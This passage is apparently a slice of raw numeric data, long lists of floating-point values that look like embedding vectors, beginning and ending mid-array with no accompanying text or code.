7,-0.009895638,0.014311528,0.044394154,0.015762813,0.01609345,0.025280502,-0.006403897,0.0009998578,-0.010606631,-0.0030879148,0.0047270763,0.0044459924,0.010570441,-0.02721236,-0.005087518,0.01754037,-0.0077560586,0.01637106,0.0040598176,-0.007838015,0.009766293,-0.014196905,0.00529706,-0.022292413,-0.0011127063,0.0119550675,-0.019512061,-0.005545365,-0.0024922101,-0.005575363,-0.013205302,-0.0133678205,0.0059754783,-0.021444209,0.029036263,-0.0038532221,0.017380897,0.0015809941,-0.008875689,-0.009226825,0.0017594821,-0.008476435,0.015570224,-0.006974448,0.025781646,0.0013688543,0.02165052,0.011974734,0.0009436476,0.014364876,-0.010680241,-0.02992956,0.004532475,-0.0019206017,0.0010048178,0.0035670476,0.00091809663,0.020864945,0.020515768,-0.0079886345,0.0048516016,0.014554689,0.022991406,0.0049166395,-0.004271404,-0.0039577004,0.022065591,0.04565219,0.0040055136,0.014755336,0.0025865873,0.010007272,-0.0007263153,-0.02442294,-0.0046354467,0.021841584,-0.0050450773,-0.024280729,0.0011713409,-0.011138824,0.009013755,0.006168535,0.0034050017,0.01251806,-0.0025196904,-0.026919857,0.017538868,-0.0062377285,0.011251423,-0.010171133,-0.044638123,-0.03990829,-0.0035105024,0.016867572,-0.0004970774,-0.015312227,0.017792912,-0.0066771735,0.017226476,0.012567863,-0.02218471,0.000047123598,-0.029108074,-0.014340334,0.017621266,0.007833564,-0.02157701,-0.0008836286,0.026840046,-0.011882715,-0.027637962,0.0022512781,-0.015188506,-0.026529243,-0.022500198,-0.006723036,-0.0023696101,-0.032806486,-0.0044955616,0.008526381,-0.015388164,-0.005765698,0.012629524,0.005351971,0.003404729,0.03170477,0.015880413,-0.017483959,0.005150174,0.020769587,0.0034427,-0.0024909663,0.010808396,0.014767499,-0.011436567,-0.009803108,-0.00759558,-0.028439745,-0.0028669026,0.00037010302,0.009674944,0.010232642,0.007580331,-0.015900385,0.0020074341,-0.00033297658,0.0043488764,-0.016752936,0.013925067,-0.008885287,-0.0039202524,-0.0073043494,-0.0028953657,-0.035397787,0.018670693,0.018210664,-0.008578701,-0.01156312,0.009086887,-0.007850005,-0.011162555,-0.011819607,-0.00035557465,-0.009904074,-0.016386572,-0.009227779,-0.0059030927,0.03847827,-0.033548024,0.0120774405,0.0074724476,0.0078074695,-0.008825572,0.0042556506,-0.011632198,-0.0062941643,0.005639981,0.017495172,-0.0038662138,0.016982557,-0.026867177,0.038768724,-0.0066956426,-0.034187336,0.013885075,0.0034918967,-0.014088736,-0.009703658,-0.02299263,-0.0060539776,0.0047048256,-0.006208664,0.006989091,0.009839767,0.019803984,0.014698869,0.0045874924,0.005604938,0.0055521224,0.004548532,-0.0067234538,-0.011502804,-0.009320136,-0.005485953,-0.0076207346,0.023367155,-0.014981285,-0.021391766,0.0008178764,-0.0052326815,-0.015345911,-0.012093274,0.014687396,-0.005638527,-0.007536039,0.017814567,-0.00796198,-0.001476244,-0.016027331,0.0069734794,-0.0033239499,0.0016234112,0.002964337,-0.01213375,0.0058883615,-0.019048838,-0.016570339,0.0052631004,0.025235757,-0.012668872,-0.0004993031,0.016935876,-0.030996935,0.014505895,0.019622725,-0.004179895,-0.024865834,0.0071833367,-0.008619423,0.0021309957,0.006678566,0.0051520844,0.010873156,0.007329253,0.0035887035,0.006780269,-0.0033737987,0.01444677,-0.01657069,0.0007269502,0.0063366992,-0.0030381717,-0.021014234,-0.019470358,-0.008927867,0.004189455,0.007865169,-0.010929134,0.002769738,-0.024737852,-0.010409158,0.0008404659,-0.020187208,-0.012391484,0.013852543,0.009420928,0.0007150826,0.0031839604,0.0076379757,0.011086693,-0.002916545,-0.02607219,0.032305926,-0.018784618,0.028528282,0.018526586,0.00008948589,-0.011858624,-0.008460008,-0.0062261047,0.004077032,0.00860353,0.022991538,-0.000120258235,0.012778818,0.005603828,-0.010366104,-0.021026818,-0.00877217,0.0049767173,-0.028470164,0.089774795,-0.0036990605,0.0062565943,0.0073580868,-0.007182702,0.020974016,0.018346198,-0.00982594,0.02014963,0.008103562,-0.004995126,-0.015915351,0.0054134815,-0.008042813,0.0029810967,0.012060733,-0.008442471,0.007942159,0.009889967,-0.02637691,-0.022168241,0.006278386,0.002909317,-0.0073449565,0.004098872,-0.030385185,0.025186215,-0.018310064,-0.0017497579,0.009507288,-0.014513165,-0.03228527,0.011421485,-0.0029304433,0.0453469,-0.0047872495,0.009198495,0.015983706,-0.008236066,-0.03952178,0.0530183,-0.007915768,-0.00917707,-0.014036736,0.008827491,-0.009118638,0.073148884,0.030760845,0.012931599,-0.014748868,0.0035348544,0.006884451,-0.023485959,0.016008971,0.015755655,-0.0034153224,0.018225517,0.0024414966,0.00091180956,0.0075546484,0.01298071,-0.012489453,-0.004543099,0.017752092,-0.0048539536,-0.028381718,-0.0061911,0.024176775,0.013726627,-0.003983284,-0.014343584,0.017228609,-0.007366602,0.019848121,0.011721335,0.0023885358,-0.0055864113,0.0037291897,0.013904842,0.01618399,-0.001396189,-0.1006954,-0.01063065,0.21508281,0.008075878,0.006315909,0.01372222,0.0030447433,-0.0007986317,-0.09423649,-0.0026791578,-0.016658695,0.0055676843,-0.011710426,-0.018719556,-0.023923282,0.024212347,0.022014989,0.0039260094,0.0011774767,-0.03698572,0.019866886,-0.016214577,0.008668368,0.0012754761,-0.0032716286,0.012290183,-0.021559969,-0.0052005686,0.005194876,-0.0149220405,-0.013786563,-0.004087864,0.012294009,-0.016517933,-0.0028525994,0.027973842,-0.023969479,0.0070750443,0.012019647,-0.004114443,0.009168094,-0.027604396,0.009575394,0.0007495769,0.0052242833,-0.03117923,-0.16436528,-0.00055273756,-0.0007655213,-0.0088422,0.01201219,-0.00019407531,0.002087595,0.006753852,-0.009426494,-0.041147582,-0.0037292931,-0.010936754,0.01406855,0.003092656,0.000038666538,-0.0246665,-0.023382092,0.0049857395,0.0136617115,0.004675413,0.023042593,0.005496047,-0.020283643,-0.013890287,0.010189976,-0.009997327,-0.013806035,0.01887433,-0.008470598,-0.0020335363,-0.021248512,0.027935661,-0.012855673,0.008760654,-0.032305326,-0.03649399,-0.005098304,0.009004115,-0.008405293,-0.0068930895,-0.012701586,-0.007893856,-0.0019550514,0.01766849,-0.00157752,0.026224595,0.0073475046,-0.0005655322,0.0020780556,0.023255806,0.03854795,0.021770727,-0.020702768,-0.001110283,-0.008088003,0.010903579,0.00046549636,-0.028219149,0.018906478,0.0050567165,0.0029645495,-0.026366008,-0.008580247,-0.032463767,0.012027131,-0.010318925,-0.0009857353,-0.019803606,0.004767162,-0.00993154,-0.020095864,0.0030230933,0.016824992,-0.022611277,0.0037010433,0.02204505,-0.0126770595,-0.011534368,0.0028325082,-0.01818969,-0.015244403,-0.028128738,0.0009076871,-0.0085724285,-0.015213642,-0.006622999,-0.0004266211,0.001361539,0.0005355694,-0.0126775205,0.0069304374,0.019813137,0.029081412,0.0019142716,-0.0025324652,0.009570004,0.012942431,0.016285218,-0.043656923,0.016313454,0.0019071611,-0.028150655,-0.018612491,0.01867768,-0.021202149,-0.009494292,-0.014926222,-0.023872131,-0.021032875,-0.0018425627,-0.012396506,0.019209526,0.016020356,-0.020024756,-0.025130538,-0.036839865,0.0012540574,0.008097135,0.0108538745,0.0032167756,-0.0235537,-0.019728214,-0.016734552,0.012199317,0.028768731,-0.011012634,-0.029805647,-0.0031719694,0.0077653695,-0.03106471,-0.0026960499,-0.0009789366,-0.026590087,0.021261936,-0.010048703,0.0053845807,-0.016164873,-0.0084716715,-0.027312726,0.009748797,-0.008712118,-0.04007827,-0.0013209826,-0.026104813,0.011412479,-0.012838655,0.0026077505,-0.009482732,-0.0048132916,-0.019920768,0.0025058312,0.041756067,-0.010065751,-0.008724635,-0.0097306995,0.09452469,-0.00012083103,-0.025662329,-0.002976499,-0.01296769,0.012574492,0.00044933747,-0.01361698,-0.014837946,-0.010277839,-0.035764255,-0.0042817327,-0.0040705325,0.001163104,-0.0041626124,0.034616042,0.0062882383,0.032568417,-0.002949421,0.008083992,0.0048948308,-0.020885207,-0.014692119,0.017039798,0.02589652,-0.005820633,-0.0017969396,-0.013962537,-0.02066767,0.008310046,0.0068936097,-0.0031503972,0.00538537,-0.007098201,-0.009416792,-0.039347995,-0.03234206,0.0018022081,-0.000077044366,0.0019191724,0.011548607,0.0032423167,0.010591723,-0.011034887,0.03567066,0.0016971539,-0.012350474,0.028596511,0.004512877,0.013280895,-0.005005339,0.022442114,0.0051364764,-0.021719659,0.0059394846,-0.017581627,0.023410695,-0.0022378142,0.0039249915,0.019099077,0.021042781,-0.008200569,0.00043778153,0.0054289997,-0.0047676424,0.008042748,0.007836427,0.017917775,-0.0013971799,0.015582576,-0.00021687218,-0.011941542,-0.0033076613,0.019242736,0.009429921,0.003615434,-0.036624324,-0.009408879,-0.031084714,0.010615009,0.010015651,-0.030435037,0.017502617,0.02652654,-0.03150228,-0.061106622,0.0097023975,0.0029726827,-0.02805125,0.0004438639,0.0008594342,0.013952649,0.028966198,0.0045320056,0.019274192,0.00158339,0.003949172,0.008703528,0.005718299,0.013124331,-0.002358822,0.014756862,0.001737995,-0.011713743,-0.011798642,-0.029306123,-0.012379538,-0.012481918,-0.0009945085,-0.026917981,-0.0074305977,-0.011640388,0.021851655,-0.019950822,-0.0076982775,0.047611453,-0.023902206,-0.016522039,0.01289253,-0.020185139,-0.003923649,-0.015711494,0.0013653332,-0.014004824,0.044564333,-0.00009372427,-0.009772277,0.0005222063,-0.010313767,0.0059214495,-0.018543996,0.024904616,-0.0016188702,0.026840474,0.012472543,0.0007153454,0.022068243,0.018848801,0.00856852,0.009602514,-0.0047354805,0.020085024,0.004261717,-0.009425794,0.0012820495,0.013932443,0.01137181,-0.013066764,-0.014777217,0.0013784684,-0.0007377737,0.0057404,0.0073649143,0.008716774,-0.0007714114,0.018353406,-0.01697821,0.010410677,0.03012512,-0.004017106,-0.016373456,0.01607121,0.004443656,0.016017567,-0.015057012,0.028250968,0.012271035,-0.020032475,0.0142056225,0.0028534553,-0.013703679,-0.0186572,0.013104833,0.010706079,-0.015475845,0.003167736,0.0019934599,0.0086780945,-0.028029382,0.018074842,0.014666159,0.025742983,-0.01633518,-0.0092569,0.0134329535,-0.0029610589,-0.0027623237,0.02031637,-0.0076816943,0.0011172105,0.004116684,0.0016942483,-0.009216104,-0.020331845,-0.024865085,-0.0028607568,0.02975794,-0.019730074,-0.014272154,0.016211256,0.0012590069,0.017711556,-0.00090261427,-0.032555226,0.018517695,-0.002548252,-0.030250954,0.00038159377,-0.010363288,0.015081567,-0.012046395,0.010145206,-0.02700962,-0.041908864,-0.0019258354,0.026608685,0.010672786,0.0053355535,-0.020975793,-0.007056346,-0.0065176366,0.0009590952,0.008354854,0.0055803233,-0.0064270054,-0.020256985,-0.014139001,0.046524823,-0.011362626,-0.009281665,0.005976576,0.03782786,0.022325054,-0.00830802,0.018938303,-0.014390554,-0.0048215394,-0.003809995,-0.020662358,-0.0125155365,0.0060276818,-0.0032303804,-0.03061916,-0.0024765506,-0.014742423,-0.0127476035,-0.009410476,-0.017864581,0.007233592,0.009601848,-0.010057808,-0.017603038,-0.025548376,-0.019743761,0.00075563765,-0.02770488,-0.003924708,-0.011754711,-0.013219613,-0.020498505,-0.0062154448,-0.008211504,-0.0061467197,-0.0015816336,0.0054305834,0.010650919,0.00642406,0.017559765,-0.0024951305,0.0014789765,-0.035297856,-0.0056169103,-0.011587853,0.0018231526,0.009514251,0.005080132,0.035097603,-0.011589575,0.014715079,0.0032602143,0.010879852,0.014515592,0.01168572,-0.0017439974,-0.011061649,0.0133812,0.02052024,0.0046087247,-0.02068068,-0.0043400936,-0.0024619973,0.009467118,0.022806462,0.00851516,-0.0053625545,-0.025328793,0.0044043874,-0.010153963,0.03799636,0.010256654,0.0019955186,0.002008718,-0.018927066,-0.00041614138,-0.0023742055,0.0014877288,0.0028423192,-0.01824369,-0.0038738993,-0.006080974,0.002369363,0.0036011594,0.012564937,-0.016183086,-0.01520141,-0.00619543,-0.004743394,0.012666924,-0.0008568037,-0.025238223,0.002825967,-0.009768989,0.0012080055,0.013701921,0.03389884,-0.010028702,-0.023746014,-0.0028634279,0.01374975,0.017314138,0.009468323,-0.0072854566,-0.011536836,-0.14479418,0.024643835,-0.021684645,-0.007793369,-0.022902576,-0.017559377,0.0009726573,0.080660485,0.014645686,-0.03806428,-0.005551319,0.027634092,-0.00030907648,0.010181619,0.0020333275,0.013216044,-0.01963693,-0.017551856,0.003032783,-0.0023465555,0.007432859,0.007042835,-0.008645732,-0.007949501,-0.0055771954,0.020753913,-0.026185887,0.020539619,0.015942007,0.012493875,0.002035858,0.0008519399,0.0009169315,-0.0047577876,-0.0042353566,0.0028434214,-0.0014988828,0.012828372,-0.0015779634,-0.0032519936,-0.005205561,-0.0248052,-0.009550705,0.024110988,-0.0028172317,0.0008977581,0.03050503,-0.0022686475,0.021144776,0.010115177,-0.0016619227,-0.0035321452,0.016991287,0.013209496,-0.0038232633,0.006922112,-0.021587165,0.02949818,-0.006499452,-0.0025102184,0.016161526,0.019692928,0.0019037322,-0.0077210725,-0.0111080045,-0.004478429,0.012064579,-0.009105451,-0.014775403,-0.006388996,-0.012358337,0.008942154,-0.0019159908,0.006920687,-0.0024334176,-0.0010695441,0.04346288,0.028265227,0.017201561,0.0043447963,-0.0004984118,-0.009502089,0.0040717497,-0.0017308951,0.005044237,0.024251986,0.008468593,-0.0024597938,-0.009828851,-0.032025173,-0.003266192,0.007235579,-0.024235165,-0.0093241,0.01680257,-0.006168735,-0.003004882,0.020706601,0.0069007687,-0.0010843552,0.0056295525,-0.0012431876,-0.008855732,-0.011470641,-0.1167049,0.001213119,0.023322726,-0.013195158,-0.008756911,-0.005055673,0.00014264412,-0.00735446,0.010140272,-0.008638652,-0.022892803,0.016360024,0.009487209,0.0037399014,-0.011369204,0.009235202,-0.042433552,0.026538676,-0.00022955118,-0.002348415,0.017783433,-0.003649145,-0.03402585,-0.00561965,0.002075948,0.0026569474,-0.008206628,0.005282697,0.009631409,-0.00376496,-0.009108065,-0.0021706873,-0.011737812,-0.0043926444,-0.0034715305,-0.024881057,-0.0016326047,0.0012409174,0.002417981,0.013856071,0.002345031,-0.019525861,0.0022632042,-0.012091762,0.0020885207,0.023060955,-0.018017791,0.0027006709,0.0073181237,0.015877338,-0.016682522,0.0024801926,0.0071718125,-0.016388444,-0.00416123,-0.011253703,-0.038407527,-0.022440162,-0.003228039,0.027147925,-0.008917489,0.012935953,-0.003682055,-0.0029869734,-0.008514973,0.032053832,0.0033990778,0.0119017875,0.007011438,0.007993014,-0.011343157,0.016186405,0.0125838965,-0.0014440643,0.017174058,0.027811518,-0.00951937,0.028573453,0.02802667,-0.0086186975,-0.017506568,0.009842596,-0.022568347,-0.013450567,-0.023342889,-0.00706618,0.012388945,0.01867391,-0.006661081,0.02655946,-0.01164874,0.022236766,-0.015186727,-0.031544298,0.012705504,0.033955622,0.018202145,0.019027242,-0.01093229,0.002605971,-0.03840227,0.00078541803,-0.006033962,0.005595162,-0.013082409,0.012581443,0.012668261,-0.011887647,0.0015373817,0.011127103,0.022300927,0.0046798103,-0.014728708,0.009330831,-0.0226292,-0.011045577,0.015070863,-0.020185666,-0.021028418,0.014567155,-0.0059127347,0.0013325268,-0.0052696336,0.005698328,-0.029363638,0.008741149,-0.019241698,0.011031523,0.015197824,0.006011928,-0.01875962,0.006611485,0.023226198,-0.029240767,-0.009343953,0.010209444,-0.00089566247,-0.011145334,0.00836156,-0.0014249026,0.01427174,-0.013415563,0.0039437064,0.0022299637,-0.008727843,-0.008134808,-0.004190562,0.025201438,0.014582708,0.02012035,-0.027564643,-0.00962105,0.0030016117,0.011636761,-0.0054752845,0.010319182,-0.020202156,-0.008732437,-0.000023880793,-0.0005388049,-0.015641917,-0.010231974,0.0116437925,-0.008769783,0.00032249998,-0.0012261892,0.029685332,0.009085531,0.0016940064,-0.001331276,0.01628538,-0.015341661,-0.0046703173,-0.0077878432,0.03272175,0.028260814,0.02016149,0.029790554,0.0126717035,0.016882231,0.0060869916,0.0071601877,-0.010661408,0.015542343,0.0283391,-0.006054074,-0.015606157,0.0152692525,-0.014888789,-0.013893052,0.0070934794,-0.0076466203,-0.013712433,-0.014264814,0.038050555,-0.0062827375,-0.010276026,-0.014765015,0.0031673664,-0.02201963,-0.0008033104,0.03253641,-0.0000049171535,0.0049548894,0.0024209549,0.009208903,0.005307179,0.01302315,0.041194994,0.0029329176,-0.0025657148,0.0061575784,0.018062009,0.0012771138,0.009890951,0.039168265,-0.019137597,-0.029933361,0.015702453,0.0029356014,0.035559002,0.006670229,0.0174226,-0.015320462,0.000003343838,0.029137617,0.020230157,-0.0032296362,-0.012413485,-0.020618035,0.011854965,0.017118571,-0.004626958,0.007315169,-0.008371148,0.004979732,0.025938958,-0.0110248495,0.0071387463,-0.00010689399,0.009360016,0.026566546,0.02075336,0.022969786,0.012895443,0.002305168,0.020534374,-0.0062923664,-0.004080752,0.0025447812,0.0023475802,-0.014818767,-0.002110003,-0.0008375847,-0.010957704,0.010422864,0.03003297,-0.010457296,-0.012427884,0.012846118,-0.017590962,0.01463582,-0.0150064,0.012941342,-0.0017227561,-0.021350306,0.0056418236,-0.021753365,-0.0059401235,0.0028253298,-0.007558903,-0.012380361,0.0016330152,0.01473715,0.022958858,-0.006431714,-0.014167729,0.008979985,-0.025738249,0.0038602406,-0.0035124514,-0.017391322,-0.0016792017,0.010020106,0.005371445,-0.0068882448,-0.0007808077,-0.01834653,-0.014264131,-0.00031846022,0.0065100803,-0.0038435436,-0.00075389014,-0.029418245,-0.018476069,0.027318567,0.035904016,-0.030449383,0.0066543664,-0.0020418398,-0.0011809715,0.0006644409,0.001480489,0.013888106,-0.000052828364,-0.021453016,-0.005077093,0.013060814,-0.022070214,-0.0128908325,0.01217369,-0.017467804,-0.010587484,0.0072432454,0.009403061,0.0051775216,-0.014492578,0.011082954,-0.005224274,-0.011882851,0.0067270636,-0.00051288825,0.02214971,0.000071775656,0.0026794565,0.008728465,0.02328574,-0.0028890932,0.0003594011,0.003543524,0.032893553,0.044159215,-0.0055426154,-0.0057741576,0.0067451214,-0.017346662,0.025514241,0.02199081,0.004257031,0.021008687,0.0058067497,0.02640555,0.0011523697,-0.013604674,0.0020380763,-0.003940482,-0.011491175,-0.015826326,0.020266391,0.004662233,-0.012493654,-0.006038474,0.0055331727,0.020360345,-0.0052402485,-0.004292444,-0.0053308387,-0.0010486424,-0.0020649775,0.022758303,-0.017260104,0.013446789,-0.0025585303,0.007375424,-0.0046676053,-0.0008189946,0.004470895,0.0015814247,0.00011833909,-0.0065299394,-0.013207599,0.012057076,-0.022521513,0.0041763526,0.012135718,-0.07741807,0.012283238,0.031395886,-0.017848032,0.027981438,-0.005564129,-0.011529017,0.014152559,0.008768544,0.028151315,-0.0068844524,-0.01617896,0.0012037485,0.018127332,0.009095227,-0.024398781,-0.0018455839,0.0102732275,-0.005542463,-0.022539863,0.00037827584,0.013647673,0.005269558,-0.013930711,0.00039861337,0.0036951662,-0.0022141968,0.015375782,0.011705541,0.010223424,-0.012520756,0.009904914,-0.0038315896,-0.02014707,-0.0015164188,0.012162686,-0.009469111,0.009828216,0.0026326326,-0.021517985,-0.0061928267,-0.009966714,0.014254829,-0.0027314418,-0.0006475786,0.022824852,-0.027039958,-0.006642637,-0.04051731,-0.01441551,0.011748484,0.0142889405,-0.011542591,0.024051303,0.009023903,-0.0006843187,0.015061167,-0.008074597,0.025294349,0.0037911143,0.0038571025,-0.0020733448,0.023149969,-0.016943011,-0.0060141277,0.011526478,-0.0073500844,0.017801294,-0.028972095,0.00567515,0.011645167,-0.005393685,-0.009654865,-0.008142195,-0.000954815,0.0016666992,-0.002524879,-0.005855359,0.0024789623,0.010229568,-0.0025754264,0.00015001756,-0.008985906,0.00040948618,-0.0056723254,0.012781772,-0.008225102,0.01452866,0.033574592,0.0019373159,0.0010636714,-0.005406441,-0.0005723464,0.010609287,-0.010934235,0.0072239893,-0.0048117074,0.0026276011,0.0099559575,0.02000498,-0.018824084,0.007741476,0.024433697,-0.024526441,0.0077809663,-0.01156293,-0.010154232,0.0003579553,-0.0040786345,-0.003603017,0.0073426208,-0.0012146048,0.012651146,-0.002310158,-0.0039615617,-0.016126374,-0.012488107,0.01836875,-0.014666671,0.012504604,-0.02771254,-0.013386426,-0.01293951,0.008860933,0.0011492566,0.0023877455,-0.002523421,-0.0026878843,-0.023253694,-0.013737229,-0.013228201,-0.0004327201,0.023112822,0.039512973,-0.0072717564,0.0050253803,0.012269234,0.0026404273,-0.011863736,0.010593689,-0.012693052,-0.045840368,0.018942373,-0.004310043,0.009912126,0.046574682,-0.007387386,-0.023273299,-0.008341654,-0.0029256977,0.0015625334,-0.028287616,-0.00818997,-0.011791774,-0.019079238,0.0055577476,0.030228928,0.005494648,-0.010855047,-0.011127858,0.0019881465,0.003958306,0.0062401677,0.004485136,-0.017271679,0.0075803082,0.01302593,0.001605145,-0.014016021,-0.01899356,-0.026817182,-0.0020716863,-0.0022736907,-0.01692657,-0.018121656,0.02157829,0.036277365,0.009359657,0.0070900614,-0.0051666247,-0.023037132,0.0057649314,-0.0037412527,0.013656135,-0.009167425,-0.018936062,0.007374523,-0.012679038,0.007450722,-0.020603681,-0.012366794,0.011725438,0.011823756,0.021103129,-0.017990673,-0.0025641092,0.0066981455,-0.013833613,-0.016129961,0.008973023,-0.012435662,0.018556325,0.011828459,0.024955489,0.014706491,0.008222702,0.013902799,-0.0002500233,0.007936993,-0.003079261,0.0150663825,0.0060031977,0.009245495,0.08772088,0.0405364,-0.00081374496,-0.0061388644,0.001991109,-0.01103414,0.039437458,-0.008219797,0.00049438595,-0.008655051,0.016708562,-0.003395095,0.011396404,-0.012429399,-0.024082268,0.02506259,0.01489216,0.010590305,-0.004024629,-0.029388847,0.005098063,-0.03901008,0.0133897085,0.009698414,0.018304547,-0.04354488,0.009457858,0.039074842,-0.00046116405,0.0080604255,0.010030676,0.030283203,0.022527106,-0.002374724,-0.03097355,-0.017320402,0.0022883308,-0.0016914295,0.0000934391,-0.021115504,0.016499786,0.02300129,0.0048831175,-0.014371796,-0.0070709465,0.010160753,0.028409472,0.00042972952,0.009640286,0.011895274,0.007194794,-0.002110935,0.015619045,0.015019103,0.029018786,-0.0050753737,0.0071312077,-0.00079071434,-0.00013959067,0.008169821,0.03132915,-0.0057944246,0.0017629387,0.014179898,0.011059631,0.0107077,-0.007228054,0.0070175873,-0.022398029,-0.021486776,0.036783796,-0.0139481835,0.006310296,0.02122088,-0.0042968905,0.009022232,-0.006783422,-0.012151051,0.001989464,-0.017537277,0.014293461,0.014762745,0.017406898,-0.034188956,-0.0011355684,-0.004403456,-0.009390235,-0.00559822,-0.015663883,-0.017259743,0.0030212908,0.0041820193,-0.0058660703,0.017428804,-0.016319685,-0.025112612,0.026705792,-0.025733441,0.024806058,0.0174619,0.0052378457,0.003487771,-0.0072540557,-0.005291728,-0.015232615,0.0017616749,0.012639472,0.028645055,0.004067068,0.013063949,-0.00661707,0.016711473,0.005381348,0.015654698,-0.010525828,-0.005946313,0.00521124,-0.022292467,0.020389767,-0.012422998,0.00045280234,0.023556802,0.014542461,0.017885324,-0.009192814,0.01586485,-0.016355941,0.018818889,0.0068300897,-0.017387407,-0.007805467,-0.040516227,-0.019359065,0.0009220263,-0.00779516,0.0097163245,0.034808394,0.0046693296,0.016916996,-0.0025976114,-0.00021333051,-0.0059145982,-0.006719816,-0.007821979,0.00856457,-0.00019602955,0.019973451,-0.02276733,0.010752633,-0.0040342966,-0.0146139255,0.0067784195,-0.00027635446,-0.017233923,-0.01747109,-0.009222594,0.014234963,-0.019926913,-0.017210938,-0.013034397,-0.004908224,-0.002662903,0.010389889,-0.05886394,0.004273435,0.0034526817,0.021944856,0.016235434,-0.011849001,-0.01037081,-0.0024483337,-0.006756027,-0.015044312,0.00054301845,-0.007382903,-0.012622173,0.026634771,0.00373568,-0.009568797,0.0023409578,0.021144506,0.01248868,-0.010096359,0.009537863,-0.00085297815,-0.0045623295,-0.010795367,0.013581777,-0.00076699164,0.03515438,-0.0012885632,0.038923115,-0.0025440995,0.0017349363,0.020750089,-0.0013282406,-0.029020682,0.054593697,-0.03467528,-0.04269566,0.002550727,-0.00018996111,0.00153335,-0.021258555,0.015064232,-0.026011843,0.002969522,-0.0036997935,-0.00464073,-0.0024003151,0.042170763,0.02586316,0.015855134,-0.020067843,-0.0010566711,-0.0009159373,-0.021183783,-0.009268677,-0.021762468,-0.0052547744,0.0018303631,-0.0068741245,-0.024442209,-0.003104202,0.00488503,-0.029279338,0.0033185182,0.028394723,0.013421031,-0.027401563,0.0019425938,0.008189212,-0.004518466,-0.010070629,-0.010248196,0.014950891,0.022092257,0.007792417,-0.0068661543,0.030545225,0.007750366,-0.0149932215,-0.003463576,0.00540267,-0.012550574,-0.0011615892,0.016153911,0.0005028531,-0.0036264043,-0.030070998,-0.037703015,0.010064723,-0.020175528,-0.023149122,-0.03327702,-0.017365394,0.0017846726,0.003135718,0.015891714,0.005576652,-0.0028526194,0.02013336,0.0057899603,0.005013768,0.0071989777,-0.010818907,0.02879669,-0.01709512,-0.009638587,0.0024508086,-0.018856814,-0.013249809,-0.029621746,-0.0015871348,-0.023928551,0.011266361,-0.015126398,-0.0053754477,0.0015694244,0.009099184,0.00008528877,-0.023079555,0.014612196,-0.024602959,0.0070076594,-0.019978683,0.015767299,0.017143058,0.034934368,-0.035148192,0.001381214,0.032180835,-0.017352318,-0.0072083008,0.00416576,-0.0018795138,-0.06396527,-0.025391098,0.029448124,-0.0001988793,-0.009005812,-0.018867915,0.03149668,-0.0029684163,-0.024877328,0.002629779,0.00041920578,0.008610773,-0.0063402047,0.026001211,0.0033964352,0.0017220085,0.0024943908,-0.01336622,-0.019453768,-0.015264486,-0.007411639,0.02403465,-0.011134607,0.0075260974,0.029035557,-0.025276022,-0.008982149,-0.002858947,0.012774773,0.00009432115,0.031152232,-0.008441628,-0.011373395,-0.015234574,0.016123373,-0.023183057,0.017495148,-0.009853175,-0.027292892,-0.0049990173,-0.004992946,0.14213452,0.00980826,-0.009942355,-0.018723236,0.00035127185,-0.0011368787,-0.014309243,0.009509681,-0.012224185,0.00009678952,0.0048411163,-0.022046061,-0.0039306274,0.009571506,0.0014811847,-0.019522922,0.0008117618,0.16437487,0.013729604,0.0065796697,0.010565757,-0.0105983615,0.025111813,0.01323685,-0.007185974,-0.049889393,-0.0030648804,-0.039182615,0.0043192375,-0.0108679095,0.026085107,0.017662585,-0.0015868313,0.007349042,0.0153809115,0.0035848017,-0.016948199,-0.0050859554,-0.014646091,-0.0018548225,0.008501321,-0.0076151863,-0.00003957788,0.017266791,-0.0006414174,0.0029807545,0.010356525,0.007915439,0.009769242,0.031005666,-0.004336053,-0.017712187,0.003982176,-0.015473842,0.009207955,-0.0007641195,0.0020290953,-0.010520445,-0.01798353,0.014941964,0.027801428,-0.0049771955,-0.011840072,0.006724612,0.004051822,0.00078849355,-0.024761753,-0.019151213,-0.036092196,0.00032088102,-0.009428514,0.009657467,-0.026161032,0.0058862637,-0.0003485147,0.0045158733,-0.013433059,-0.016191686,0.011522624,-0.014058199,0.02154848,0.014700569,-0.025693674,-0.012019703,0.0076372316,0.00851301,0.017248267,-0.00313622,0.009609775,0.015398987,-0.02355155,0.0050013624,0.00092524715,0.0014861528,0.0004821134,0.018669413,-0.012185372,-0.0046262266,-0.0060433364,-0.030991087,-0.024498153,0.009992945,-0.0044918586,0.025583038,0.015685087,0.0223396,-0.023308525,0.002924354,-0.011643194,-0.000071852715,0.013248585,0.00087980786,-0.0031032038,0.02174574,-0.017751344,-0.007936517,0.0029640628,0.0036684303,-0.037237845,-0.010682902,0.00039999938,-0.0046324846,0.028548252,0.021687327,-0.024900425,0.026994698,-0.012223555,0.008869143,-0.017973043,0.009101973,-0.005690378,0.014107685,0.0241326,-0.015548201,0.00034013984,-0.004516929,0.0037787214,-0.021763792,-0.0021039352,-0.02145432,0.010633087,0.00095793564,0.001415842,0.0035519882,-0.0058640055,0.014988674,0.014397064,0.0042590867],[0.0000021320484,-0.0010299558,0.0097918315,-0.0057514687,0.0012295293,-0.010849712,-0.019519007,0.00054432475,0.03115063,-0.011621262,0.019506665,0.023296762,-0.010860143,-0.012695158,-0.011240197,0.0032537635,-0.022772668,0.0032103215,0.020480717,-0.005907238,0.0049097277,-0.014733505,0.004909977,-0.016200302,0.043569624,-0.0017774308,-0.013219379,-0.016192144,0.0021201875,-0.010447665,0.011858052,0.010479897,0.015747365,0.0033767764,-0.0068079736,0.0101885805,-0.018863315,-0.00912872,0.004551903,0.0038587123,0.028410954,0.004397644,-0.00994836,-0.007658945,-0.016129915,-0.018611344,-0.025180118,-0.012413524,0.0038793238,0.0014884857,-0.007831197,0.015469691,-0.00020590406,0.020964505,0.0062902365,0.014940837,-0.013695449,-0.029706508,0.024322797,-0.022888348,-0.016078416,0.010952088,-0.015982281,-0.0012340074,0.018109614,-0.01839739,-0.007950323,0.003833989,-0.022075206,-0.0003891774,0.034253586,-0.00016511354,0.0050439155,-0.0003918843,-0.0022719344,0.0072857,0.006493275,-0.008398354,-0.005810289,-0.023763638,-0.02234279,0.024013365,0.036038842,-0.026432488,0.017345518,0.0032784839,0.0116086565,-0.021077748,0.024768123,-0.017729726,-0.015703386,-0.0070973737,-0.0027469895,0.005403816,-0.0024078307,0.015374845,0.022179082,-0.0018644913,0.0031902755,-0.0024531304,-0.007948233,0.01487334,-0.02266617,-0.010753702,0.023996813,-0.03077911,-0.0069423034,0.017771827,0.009301962,0.009745136,0.0013110035,0.01379659,0.013977619,0.006331873,0.012660158,0.007123868,-0.013795926,0.028794225,-0.017050356,0.003984942,0.016686222,0.004255854,0.013673683,0